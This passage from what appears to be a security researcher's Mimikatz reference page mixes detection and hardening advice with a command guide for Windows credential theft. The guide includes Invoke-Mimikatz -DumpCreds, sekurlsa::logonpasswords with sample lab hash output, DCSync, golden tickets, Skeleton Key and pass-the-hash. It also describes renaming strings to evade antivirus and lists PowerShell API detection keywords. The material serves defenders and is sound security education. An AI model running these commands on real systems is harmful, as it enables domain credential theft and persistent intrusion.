href="http://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service">LSASS</a>) process. This is meant to facilitate single sign-on (SSO), ensuring a user isn’t prompted each time resource access is requested. 
The credential data may include Kerberos tickets, NTLM password hashes, LM password hashes (if the password is &lt;15 characters, depending on Windows OS version and patch level), and even clear-text passwords (to support WDigest and SSP authentication, among others). While you can <a href="http://support.microsoft.com/kb/299656">prevent a Windows computer from creating the LM hash</a> in the local computer SAM database (and the AD database), this doesn’t prevent the system from generating the LM hash in memory. <a href="https://technet.microsoft.com/en-us/magazine/2006.08.securitywatch.aspx">By default, Windows Server 2008 and Windows Vista no longer generate LM hashes</a> for users unless explicitly enabled. Starting with Windows 8.1 and Windows Server 2012 R2, the LM hash and &#8220;clear-text&#8221; password are no longer in memory. <a href="https://adsecurity.org/?p=559">This functionality was also &#8220;back-ported&#8221; to earlier versions of Windows (Windows 7/8/2008R2/2012) in kb2871997</a>, though in order to prevent the &#8220;clear-text&#8221; password from being placed in LSASS, the following registry value needs to be set to &#8220;0&#8221; (Digest Disabled):</p> <p>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/WDIGEST-RegistryKey-UseLogonCredential-1.jpg" rel="attachment wp-att-2344"><img decoding="async" class="alignnone wp-image-2344" src="https://adsecurity.org/wp-content/uploads/2015/09/WDIGEST-RegistryKey-UseLogonCredential-1.jpg" alt="WDIGEST-RegistryKey-UseLogonCredential-1" width="358" height="175" srcset="https://adsecurity.org/wp-content/uploads/2015/09/WDIGEST-RegistryKey-UseLogonCredential-1.jpg 959w, https://adsecurity.org/wp-content/uploads/2015/09/WDIGEST-RegistryKey-UseLogonCredential-1-300x147.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/09/WDIGEST-RegistryKey-UseLogonCredential-1-768x376.jpg 768w"
sizes="(max-width: 358px) 100vw, 358px" /></a></p> <p>This registry key is worth monitoring in your environment since an attacker may wish to set it to 1 to enable Digest password support which forces &#8220;clear-text&#8221; passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2. Windows 8.1/2012 R2 and newer do not have a “UseLogonCredential” DWORD value, so it would have to be created. The existence of this key on these systems may indicate a problem.</p> <p>Note that running code directly on a target system is rarely desirable for an attacker, so Mimikatz is continuously updated with new capability to be run remotely. This include running Mimikatz remotely against a remote system to dump credentials, using Invoke-Mimikatz remotely with PowerShell Remoting, and <a href="#DCSync">DCSync</a>, the latest feature to grab password data for any Active Directory account in the domain remotely against a DC without any Mimikatz code being run on the DC (<a href="https://adsecurity.org/?p=1729">it uses Microsoft&#8217;s Domain Controller official replication APIs, once the correct rights are attained</a>).</p> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>Available Credentials by OS:</strong></span></h3> <p>Benjamin Delpy posted an Excel chart on OneDrive (no longer available, but shown below) that shows what type of credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2 which have enhanced protection mechanisms reducing the amount and type of credentials kept in memory.<br /> <a href="https://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png"><img decoding="async" class="alignnone wp-image-583" src="https://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart-300x129.png" alt="Delpy-CredentialDataChart" width="339" height="146" srcset="https://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart-300x129.png 300w, 
https://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart-1024x441.png 1024w, https://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png 1610w" sizes="(max-width: 339px) 100vw, 339px" /></a><br /> <em>(Click image to embiggen)</em></p> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>PowerShell &amp; Mimikatz:</strong></span></h3> <p>The majority of Mimikatz functionality is available in <a href="https://github.com/mattifestation/PowerSploit">PowerSploit </a>(PowerShell Post-Exploitation Framework) through the “<a href="https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1">Invoke-Mimikatz</a>” PowerShell script (written by <a href="https://twitter.com/JosephBialek">Joseph Bialek</a>) which “leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the Mimikatz binary to disk.” Note that the PowerSploit framework is now hosted in the <a href="https://github.com/PowerShellMafia/PowerSploit">&#8220;PowerShellMafia&#8221; GitHub repository</a>.</p> <p>What gives Invoke-Mimikatz its &#8220;magic&#8221; is the ability to reflectively load the Mimikatz DLL (embedded in the script) into memory. The Invoke-Mimikatz code can be downloaded from the Internet (or intranet server), and executed from memory without anything touching disk. Furthermore, if Invoke-Mimikatz is run with the appropriate rights and the target computer has PowerShell Remoting enabled, it can pull credentials from other systems, as well as execute the standard Mimikatz commands remotely, without files being dropped on the remote system.</p> <p>Invoke-Mimikatz is not updated when Mimikatz is, though it can be (manually). One can swap out the DLL encoded elements (32bit &amp; 64bit versions) with newer ones. 
Will Schroeder (<a href="https://twitter.com/harmj0y">@HarmJ0y)</a> has <a href="http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/">information on updating the Mimikatz DLLs in Invoke-Mimikatz</a> (it&#8217;s not a very complicated process). The <a href="https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1">PowerShell Empire version of Invoke-Mimikatz</a> is usually kept up to date.</p> <ul> <li>Use mimikatz to dump credentials out of LSASS:  <em>Invoke-Mimikatz -DumpCreds</em></li> <li>Use mimikatz to export all private certificates (even if they are marked non-exportable): <em>Invoke-Mimikatz -DumpCerts</em></li> <li>Elevate privilege to have debug rights on remote computer: <em>Invoke-Mimikatz -Command &#8220;privilege::debug exit&#8221; -ComputerName &#8220;computer1&#8221;</em></li> </ul> <p>The Invoke-Mimikatz &#8220;Command&#8221; parameter enables Invoke-Mimikatz to run custom Mimikatz commands.</p> <p><strong><em>Defenders should expect that any functionality included in Mimikatz is available in Invoke-Mimikatz.</em></strong></p> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>Detecting Mimikatz:</strong></span></h3> <p>There are several ways to potentially detect Mimikatz use on a network, though none are guaranteed. Since Mimikatz&#8217;s source code is on <a href="https://github.com/gentilkiwi/mimikatz">GitHub</a>, anyone with Visual Studio can compile their own version. I built my own version of Mimikatz called &#8220;kitikatz&#8221; by replacing all instances of &#8220;mimikatz&#8221; with &#8220;kitikatz&#8221;, and the detection rate at VirusTotal was not good (4/54). Windows Defender on my Windows 10 system detected it.  I then replaced &#8220;Benjamin Delpy&#8221; and &#8220;gentilkiwi&#8221; with the same words, just replacing the e&#8217;s with 3&#8217;s and the i&#8217;s with 1&#8217;s.
The detection rate was <a href="https://www.virustotal.com/en/file/84b6cd8ccaa60a89c1375bec5044e6240d8a2db3f19fecd763749fa9a530470b/analysis/1449967355/">still poor (4/54)</a>. Windows Defender on my Windows 10 system did not detect it. So, your mileage will vary regarding detection. While <a href="http://blog.virustotal.com/2012/08/av-comparative-analyses-marketing-and.html">VirusTotal is not the best method to determine AV detection</a>, it is a relatively simple method to get some basic numbers.</p> <ul> <li>Benjamin Delpy publishes <a href="https://plusvic.github.io/yara/">YARA rules</a> for Mimikatz on the <a href="https://github.com/gentilkiwi/mimikatz">Mimikatz GitHub repository</a>.</li> <li>Run AntiVirus software with the latest definition files. According to <a href="https://www.virustotal.com/en/">VirusTotal</a>, the <a href="https://www.virustotal.com/en/file/843b2c2e7a631c393a2763dd03d02166cee0631c07d10dae0a2e6a5816280dd8/analysis/">mimikatz.exe dated 11/11/2015</a> (32bit &amp; 64bit) is detected by <a href="https://www.virustotal.com/en/file/843b2c2e7a631c393a2763dd03d02166cee0631c07d10dae0a2e6a5816280dd8/analysis/">35/35 of the AV engines</a>. Renaming the file doesn&#8217;t change the scan results. Note that Benjamin has noted real-world results to be <a href="https://twitter.com/gentilkiwi/status/658344484615421954">less successful</a>. However, AV will usually flag the known bad files. AntiVirus is part of foundational security &#8211; the first layer in &#8220;defense in depth&#8221;.</li> <li>Mimikatz (as of October) <a href="http://blog.cobaltstrike.com/2015/11/11/revolutionary-device-detects-mimikatz-use/">activates attached BusyLights</a>. <em>[implemented in Mimikatz version 2.0 alpha 20151008 (oe.eo) edition]</em></li> <li>Leverage security software to identify processes that interact with LSASS.
Security software that monitors for process injection may also be able to regularly detect Mimikatz use.</li> <li><a href="https://isc.sans.edu/diary/Detecting+Mimikatz+Use+On+Your+Network/19311">HoneyTokens/HoneyHashes</a> involve placing special credentials in memory on a number of computers in the enterprise. These credentials are flagged so that when anyone attempts to use them, a critical alert goes out. This requires some sort of push method as well as placing credentials that are attractive to an attacker. In theory, this could detect credential theft and use in the environment.</li> <li>If the WDIGEST registry value (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, &#8220;UseLogonCredential&#8221;) is supposed to be set to &#8220;0&#8221; in the enterprise to prevent &#8220;clear-text&#8221; passwords from being stored in LSASS and there are systems where it was switched to &#8220;1&#8221;, this may be indicative of credential theft activity. This registry value is worth monitoring in your environment since an attacker may wish to set it to 1 to enable Digest password support, which forces &#8220;clear-text&#8221; passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2 (probably 2016 as well).</li> <li><a href="https://adsecurity.org/?p=1515">Forged Kerberos ticket detection is covered on this page I published in early 2015. These methods can detect Golden Tickets, Silver Tickets, and Trust Tickets</a>. I also have information on <a href="https://adsecurity.org/?p=763">how to detect MS14-068 Kerberos vulnerability exploitation</a>.</li> <li>Enable LSA Protection on all Windows versions in the enterprise that support it.
This prevents Mimikatz from working &#8220;out-of-the-box&#8221; and requires use of the Mimikatz driver, which logs events when it interacts with LSASS.</li> <li>There are <a href="https://technet.microsoft.com/en-us/library/mt431757%28v=vs.85%29.aspx">new/updated events starting with Windows 10 and Windows Server 2016</a> to potentially detect Mimikatz use:</li> </ul> <blockquote><p><strong>Added a default process SACL to LSASS.exe</strong><br /> In Windows 10, a default process SACL was added to LSASS.exe to log processes attempting to access LSASS.exe. The SACL is L&#8221;S:(AU;SAFA;0x0010;;;WD)&#8221;. You can enable this under Advanced Audit Policy Configuration\Object Access\Audit Kernel Object.<br /> This can help identify attacks that steal credentials from the memory of a process.</p></blockquote> <p>&nbsp;</p> <h4><span style="text-decoration: underline;">Mimikatz &amp; LSA Protection:</span></h4> <p>Windows Server 2012 R2 and Windows 8.1 include a new feature called LSA Protection, which involves enabling <a href="https://technet.microsoft.com/en-us/library/dn408187.aspx">LSASS as a protected process on Windows Server 2012 R2</a> (Mimikatz can bypass this with a driver, but that should make some noise in the event logs):</p> <p><em>The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent reading memory and code injection by non-protected processes.
This provides added security for the credentials that the LSA stores and manages.</em></p> <p><span style="text-decoration: underline;">Enabling LSA protection:</span></p> <ol> <li>Open the Registry Editor (RegEdit.exe), navigate to the registry key located at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa, and set the value under that key to: “RunAsPPL”=dword:00000001.</li> <li>Create a new GPO and browse to Computer Configuration, Preferences, Windows Settings. Right-click Registry, point to New, and then click Registry Item. The New Registry Properties dialog box appears. In the Hive list, click HKEY_LOCAL_MACHINE. In the Key Path list, browse to SYSTEM\CurrentControlSet\Control\Lsa.  In the Value name box, type RunAsPPL. In the Value type box, click REG_DWORD. In the Value data box, type 00000001. Click OK.</li> </ol> <p>LSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this with a driver (&#8220;!+&#8221;), which is why the driver-load and LSASS-access events noted above are worth monitoring.</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Driver-Remove-LSASS-Protection.jpg" rel="attachment wp-att-2178"><img loading="lazy" decoding="async" class="alignnone wp-image-2178" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Driver-Remove-LSASS-Protection.jpg" alt="Mimikatz-Driver-Remove-LSASS-Protection" width="281" height="139" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Driver-Remove-LSASS-Protection.jpg 682w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Driver-Remove-LSASS-Protection-300x148.jpg 300w" sizes="(max-width: 281px) 100vw, 281px" /></a></p> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>Detecting Invoke-Mimikatz:</strong></span></h3> <ul> <li>Ensure all Windows systems have PowerShell v3 or newer.
Newer versions of PowerShell have better logging features, especially PowerShell v5.</li> <li>Enable PowerShell Module Logging via Group Policy: Computer Configuration, Policies, Administrative Templates, Windows Components, Windows PowerShell, Turn on Module Logging. Enter &#8220;*&#8221; and click OK. This will log all PowerShell activity including all PowerShell modules.</li> </ul> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/PowerShellModuleLogging-All.jpg" rel="attachment wp-att-2191"><img loading="lazy" decoding="async" class="alignnone wp-image-2191" src="https://adsecurity.org/wp-content/uploads/2015/09/PowerShellModuleLogging-All.jpg" alt="PowerShellModuleLogging-All" width="319" height="294" srcset="https://adsecurity.org/wp-content/uploads/2015/09/PowerShellModuleLogging-All.jpg 704w, https://adsecurity.org/wp-content/uploads/2015/09/PowerShellModuleLogging-All-300x276.jpg 300w" sizes="(max-width: 319px) 100vw, 319px" /></a></p> <ul> <li>PowerShell activity will be logged to the PowerShell Operational Log.
Push or pull these events to a central logging server (via <a href="http://blogs.technet.com/b/wincat/archive/2008/08/11/quick-and-dirty-large-scale-eventing-for-windows.aspx">Windows Event Forwarding or similar</a>) or SIEM.</li> <li>Parse PowerShell events for the following: <ul> <li>“System.Reflection.AssemblyName”</li> <li>“System.Reflection.Emit.AssemblyBuilderAccess “</li> <li>“System.Runtime.InteropServices.MarshalAsAttribute”</li> <li>“TOKEN_PRIVILEGES”</li> <li> “SE_PRIVILEGE_ENABLED“</li> </ul> </li> </ul> <p><em>Note: While it may be possible to identify Mimikatz usage by alerting on &#8220;mimikatz&#8221;, &#8220;Delpy&#8221;, or &#8220;gentilkiwi&#8221;, a &#8220;sophisticated&#8221; attacker will likely roll their own version of Mimikatz or Invoke-Mimikatz without these keywords.</em></p> <p>&nbsp;</p> <h4><span style="text-decoration: underline;">Detecting Offensive PowerShell Tools:</span></h4> <p>Many PowerShell offensive tools use the following calls which are logged in PowerShell Module Logging.</p> <ul> <li>“GetDelegateForFunctionPointer”</li> <li>“System.Reflection.AssemblyName“</li> <li>“System.Reflection.Emit.AssemblyBuilderAccess“</li> <li>“System.Management.Automation.WindowsErrorReporting”</li> <li>“MiniDumpWriteDump”</li> <li>“TOKEN_IMPERSONATE”</li> <li>“TOKEN_DUPLICATE”</li> <li>“TOKEN_ADJUST_PRIVILEGES”</li> <li>“TOKEN_PRIVILEGES”</li> </ul> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>&#8220;Sneaky&#8221; Mimikatz Execution:</strong></span></h3> <p>Casey Smith (<a href="https://twitter.com/subTee">@subtee </a>&amp; <a href="http://subt0x10.blogspot.com/">blog</a>) has done a LOT of work showing how <a href="http://subt0x10.blogspot.com/2015/11/your-whitelisting-application-has-no.html">application whitelisting is not the panacea many believe it to be</a>. 
Despite that, application whitelisting is a solid layer in a defense in depth strategy.<br /> Casey also has come up with many creative and sneaky ways to execute Mimikatz.</p> <ul> <li>Execute Mimikatz Inside of RegSvcs or RegAsm &#8211; .NET utilities Proof of Concept</li> <li><a href="http://subt0x10.blogspot.com/2015/09/simple-example-of-encoded-mimikatz-upx.html">Mimikatz packed &amp; hidden in an image file </a></li> <li>Downloads and Executes Mimikatz In Memory From GitHub</li> </ul> <p>Note: Subtee has discontinued his GitHub repo, so these links no longer work and have been removed.</p> <h3><span style="text-decoration: underline;"><strong>Most Popular Mimikatz Commands:</strong></span></h3> <p>Here are just some of the most popular Mimikatz commands and related functionality.</p> <ul> <li><a href="#CRYPTOCertificates">CRYPTO::Certificates</a> &#8211; list/export certificates</li> <li><a href="#KERBEROSGolden">KERBEROS::Golden</a> &#8211; create golden/silver/trust tickets</li> <li><a href="#KERBEROSList">KERBEROS::List</a> &#8211; List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user&#8217;s tickets. Similar to the functionality of &#8220;klist&#8221;.</li> <li><a href="#KERBEROSPTT">KERBEROS::PTT</a> &#8211; pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust).</li> <li><a href="#LSADUMPDCSync">LSADUMP::DCSync</a> &#8211; ask a DC to synchronize an object (get password data for account). No need to run code on DC.</li> <li><a href="#LSADUMPLSA">LSADUMP::LSA</a> &#8211; Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file.
Also used to get specific account credentials such as krbtgt with the parameter /name: &#8220;/name:krbtgt&#8221;</li> <li><a href="#LSADUMPSAM">LSADUMP::SAM</a> &#8211; get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.</li> <li><a href="#LSADUMPTrust">LSADUMP::Trust </a>&#8211; Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).</li> <li><a href="#MISCAddSid">MISC::AddSid</a> &#8211; Add to SIDHistory of a user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID::modify as of May 6th, 2016.</li> <li><a href="#MISCMemSSP">MISC::MemSSP</a> &#8211; Inject a malicious Windows SSP to log locally authenticated credentials.</li> <li><a href="#MISCSkeleton">MISC::Skeleton</a> &#8211; Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a &#8220;master password&#8221; (aka Skeleton Key) as well as their usual password.</li> <li><a href="#PRIVILEGEDebug">PRIVILEGE::Debug</a> &#8211; get debug rights (this or Local System rights is required for many Mimikatz commands).</li> <li><a href="#SEKURLSAEkeys">SEKURLSA::Ekeys </a>&#8211; list Kerberos encryption keys</li> <li><a href="#SEKURLSAKerberos">SEKURLSA::Kerberos</a> &#8211; List Kerberos credentials for all authenticated users (including services and computer account)</li> <li><a href="#SEKURLSAKrbtgt">SEKURLSA::Krbtgt</a> &#8211; get Domain Kerberos service account (KRBTGT) password data</li> <li><a href="#SEKURLSALogonPasswords">SEKURLSA::LogonPasswords </a>&#8211; lists all available provider credentials.
This usually shows recently logged on user and computer credentials.</li> <li><a href="#SEKURLSAPth">SEKURLSA::Pth</a> &#8211; Pass-the-Hash and Over-Pass-the-Hash</li> <li><a href="#SEKURLSATickets">SEKURLSA::Tickets</a> &#8211; Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer&#8217;s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of other sessions (users).</li> <li><a href="#TOKENList">TOKEN::List</a> &#8211; list all tokens of the system</li> <li><a href="#TOKENElevate">TOKEN::Elevate</a> &#8211; impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box</li> <li><a href="#TOKENElevate">TOKEN::Elevate /domainadmin</a> &#8211; impersonate a token with Domain Admin credentials.</li> </ul> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>ADSecurity Mimikatz Posts:</strong></span></h3> <p>All posts mentioning Mimikatz: <a href="https://adsecurity.org/?tag=mimikatz">ADSecurity.org Mimikatz Posts</a></p> <ul> <li><a href="https://adsecurity.org/?p=556">Mimikatz and Active Directory Kerberos Attacks</a></li> <li><a href="https://adsecurity.org/?p=2053">Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync </a></li> <li><a href="https://adsecurity.org/?p=2011">How Attackers Use Kerberos Silver Tickets to Exploit Systems </a></li> <li><a href="https://adsecurity.org/?p=1729">Mimikatz DCSync Usage, Exploitation, and Detection </a></li> <li><a href="https://adsecurity.org/?p=1760">Sneaky Active Directory Persistence #12: Malicious Security Support Provider (SSP)</a></li> <li><a href="https://adsecurity.org/?p=1714">Sneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM) </a></li> <li><a href="https://adsecurity.org/?p=1640">Kerberos Golden Tickets
are Now More Golden </a></li> <li><a href="https://adsecurity.org/?p=1588">It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts </a></li> <li><a href="https://adsecurity.org/?p=1567">Detecting Mimikatz Use </a></li> </ul> <p>&nbsp;</p> <h3><span style="text-decoration: underline;"><strong>Mimikatz Command Guide:</strong></span></h3> <p>Mimikatz can be executed in interactive mode by simply running &#8220;Mimikatz.exe&#8221; or pass it a command and exit (example: &#8216;<em>Mimikatz &#8220;kerberos::list&#8221; exit&#8217;</em>). Invoke-Mimikatz does not have an interactive mode.</p> <p>Mimikatz can be used to pass commands from the command line to Mimikatz for processing in order which is useful for Invoke-Mimikatz or when using Mimikatz in scripts. Appending &#8220;exit&#8221; exits Mimikatz after the last command is executed (do this so Mimikatz exits gracefully).</p> <blockquote> <pre><strong>PS C:\temp\mimikatz&gt; .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit</strong></pre> <pre>.#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 13 2015 00:44:32) .## ^ ##. 
## / \ ##  /* * * ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo) '#####'                                     with 17 modules * * */</pre> <pre>mimikatz(commandline) # <em>privilege::debug</em> Privilege '20' OK</pre> <pre>mimikatz(commandline) # <em>sekurlsa::logonpasswords</em></pre> <pre>Authentication Id : 0 ; 646260 (00000000:0009dc74) Session           : RemoteInteractive from 2 User Name         : adsadministrator Domain            : ADSECLAB Logon Server      : ADSDC03 Logon Time        : 11/27/2015 11:41:27 AM SID               : S-1-5-21-1581655573-3923512380-696647894-500 msv : [00000003] Primary * Username : ADSAdministrator * Domain   : ADSECLAB * NTLM     : 5164b7a0fda365d56739954bbbc23835 * SHA1     : f8db297cb2ae403f8915675cebe79643d0d3b09f [00010000] CredentialKeys * NTLM     : 5164b7a0fda365d56739954bbbc23835 * SHA1     : f8db297cb2ae403f8915675cebe79643d0d3b09f tspkg : wdigest : * Username : ADSAdministrator * Domain   : ADSECLAB * Password : (null) kerberos : * Username : adsadministrator * Domain   : LAB.ADSECURITY.ORG * Password : (null) ssp :   KO</pre> </blockquote> <p>&nbsp;</p> <p>The interactive mode provides a &#8220;Mimikatz console&#8221; where commands can be entered and executed in real-time:</p> <blockquote> <pre><strong>PS C:\temp\mimikatz&gt; .\mimikatz</strong></pre> <pre>.#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 13 2015 00:44:32) .## ^ ##. 
## / \ ##  /* * * ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo) '#####'                                     with 17 modules * * */</pre> <pre><strong>mimikatz # privilege::debug</strong> Privilege '20' OK</pre> <pre><strong>mimikatz # sekurlsa::logonpasswords</strong></pre> <pre>Authentication Id : 0 ; 646260 (00000000:0009dc74) Session           : RemoteInteractive from 2 User Name         : adsadministrator Domain            : ADSECLAB Logon Server      : ADSDC03 Logon Time        : 11/27/2015 11:41:27 AM SID               : S-1-5-21-1581655573-3923512380-696647894-500 msv : [00000003] Primary * Username : ADSAdministrator * Domain   : ADSECLAB * NTLM     : 5164b7a0fda365d56739954bbbc23835 * SHA1     : f8db297cb2ae403f8915675cebe79643d0d3b09f [00010000] CredentialKeys * NTLM     : 5164b7a0fda365d56739954bbbc23835 * SHA1     : f8db297cb2ae403f8915675cebe79643d0d3b09f tspkg : wdigest : * Username : ADSAdministrator * Domain   : ADSECLAB * Password : (null) kerberos : * Username : adsadministrator * Domain   : LAB.ADSECURITY.ORG * Password : (null) ssp :   KO credman :</pre> </blockquote> <h4></h4> <h3><span style="text-decoration: underline;"><strong>Mimikatz Command Reference:<br /> </strong></span></h3> <p><strong><a href="https://adsecurity.org/?page_id=1821#MimikatzVersionHistory">Mimikatz Version History</a></strong></p> <h4><span style="text-decoration: underline;">Mimikatz Modules:</span></h4> <ul> <li><a href="https://adsecurity.org/?page_id=1821#BUSYLIGHT">BUSYLIGHT</a></li> <li><a href="#CRYPTO">CRYPTO</a> <ul> <li><a href="#CRYPTOCertificates">CRYPTO::Certificates</a></li> </ul> </li> <li><a href="#DPAPI">DPAPI</a></li> <li><a href="#EVENT">EVENT</a></li> <li><a href="#IIS">IIS</a></li> <li><a href="#KERBEROS">KERBEROS</a> <ul> <li><a href="#KERBEROSGolden">Golden Tickets</a></li> <li><a href="#SilverTicket">Silver Tickets</a></li> <li><a href="#TrustTicket">Trust 
Tickets</a></li> <li><a href="#KERBEROSPTT">KERBEROS::PTT</a></li> </ul> </li> <li><a href="#LSADUMP">LSADUMP</a> <ul> <li><a href="#DCSync">DCSync</a></li> <li>DCShadow</li> <li><a href="#LSADUMPLSA">LSADUMP::LSA</a></li> <li><a href="#LSADUMPNetSync">LSADUMP::NetSync</a></li> <li><a href="#LSADUMPSAM">LSADUMP::SAM</a></li> <li><a href="#LSADUMPTrust">LSADUMP::Trust </a></li> </ul> </li> <li><a href="#MISC">MISC</a></li> <li><a href="#MINESWEEPER">MINESWEEPER</a></li> <li><a href="#Net">NET</a></li> <li><a href="#PRIVILEGE">PRIVILEGE</a> <ul> <li><a href="#PRIVILEGEDebug">PRIVILEGE::Debug</a></li> </ul> </li> <li><a href="#PROCESS">PROCESS</a></li> <li><a href="#RPC">RPC</a></li> <li><a href="#SERVICE">SERVICE</a></li> <li><a href="#SEKURLSA">SEKURLSA</a> <ul> <li><a href="#SEKURLSAKerberos">SEKURLSA::Kerberos</a></li> <li><a href="#SEKURLSAKrbtgt">SEKURLSA::Krbtgt</a></li> <li><a href="#SEKURLSALogonPasswords">SEKURLSA::LogonPasswords </a></li> <li><a href="#SEKURLSAPth">SEKURLSA::Pth</a></li> </ul> </li> <li><a href="#SID">SID</a></li> <li><a href="#STANDARD">STANDARD</a></li> <li><a href="#SYSENV">SYSENV</a></li> <li><a href="#TOKEN">TOKEN</a> <ul> <li><a href="#TOKENElevate">TOKEN::Elevate</a></li> <li><a href="#TOKENElevate">TOKEN::Elevate /domainadmin</a></li> </ul> </li> <li><a href="#TS">TS</a></li> <li><a href="#VAULT">VAULT</a></li> </ul> <p>NOTE: Any item marked &#8220;experimental&#8221; should only be used in test environments.</p> <p><span id="more-1821"></span></p> <h3>Version</h3> <p>Run Version to get the Mimikatz version and additional information about the Windows system, such as the version and if Credential Manager is running.</p> <h3></h3> <h3><b><a id="BUSYLIGHT"></a>BUSYLIGHT</b></h3> <p>The BUSYLIGHT Mimikatz module provides additional information for and control of connected <a href="http://blog.cobaltstrike.com/2015/11/11/revolutionary-device-detects-mimikatz-use/">BusyLights</a>.</p> <p><b>BUSYLIGHT::List</b></p> 
<p><b>BUSYLIGHT::</b><strong>Off</strong></p> <p><b>BUSYLIGHT::Single</b></p> <p><b>BUSYLIGHT::Status</b></p> <p><b>BUSYLIGHT::</b><strong>Test</strong></p> <p>&nbsp;</p> <h3><b><a id="CRYPTO"></a>CRYPTO</b></h3> <p>The CRYPTO Mimikatz module provides advanced capability to interface with Windows cryptographic functions (<a href="https://msdn.microsoft.com/en-us/library/ms867086.aspx">CryptoAPI</a>).<br /> Typical use is to export certificates that aren&#8217;t marked as &#8220;exportable.&#8221;</p> <p><b>CRYPTO::CAPI</b> &#8211; (experimental) Patch CryptoAPI layer for easy export</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-CAPI.jpg" rel="attachment wp-att-2158"><img loading="lazy" decoding="async" class="alignnone wp-image-2158" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-CAPI.jpg" alt="Mimikatz-Crypto-CAPI" width="205" height="47" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-CAPI.jpg 319w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-CAPI-300x69.jpg 300w" sizes="(max-width: 205px) 100vw, 205px" /></a></p> <p><a id="CRYPTOCertificates"></a><b>CRYPTO::Certificates</b> &#8211; list/export certificates</p> <p>Carlos Perez (aka <a href="https://twitter.com/Carlos_Perez">DarkOperator</a>) has a <a href="http://www.darkoperator.com/blog/2013/6/11/stealing-user-certificates-with-meterpreter-mimikatz-extensi.html">great blog post on using Mimikatz to export certificates</a>.<br /> This command lists certificates and the properties of their keys. It can export certificates too.
Typically requires &#8220;privilege::debug&#8221;</p> <ul> <li>/systemstore &#8211; optional &#8211; the system store that must be used (default: CERT_SYSTEM_STORE_CURRENT_USER)</li> <li>/store &#8211; optional &#8211; the store that must be used to list/export certificates (default: My) &#8211; full list with crypto::stores</li> <li>/export &#8211; optional &#8211; export all certificates to files (public parts in DER, private parts in PFX files &#8211; password protected with: mimikatz)</li> </ul> <p><span style="text-decoration: underline;">Benjamin&#8217;s comments on CRYPTO:Certificates:</span></p> <ul> <li>See <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-%7E-crypto#stores"><code>crypto::stores</code></a> for valid <code>systemstore</code> list, and its output for <code>store</code> list.</li> <li>Non exportable keys (with <code>KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFile (0x8009000b)</code>) can often be exported with <a 